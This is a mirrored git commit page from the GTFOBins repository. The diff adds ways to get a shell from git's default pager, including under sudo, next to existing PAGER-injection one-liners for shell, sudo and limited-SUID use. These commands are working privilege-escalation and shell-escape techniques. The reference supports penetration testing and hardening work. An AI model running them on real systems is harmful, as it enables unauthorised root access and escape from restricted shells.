mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
Add functions with default pager in git
This commit is contained in:
parent
27494be274
commit
08f5b33651
@ -2,8 +2,16 @@
|
||||
functions:
|
||||
shell:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
git -p help
|
||||
!/bin/sh
|
||||
sudo:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
sudo git -p help
|
||||
!/bin/sh
|
||||
limited-suid:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user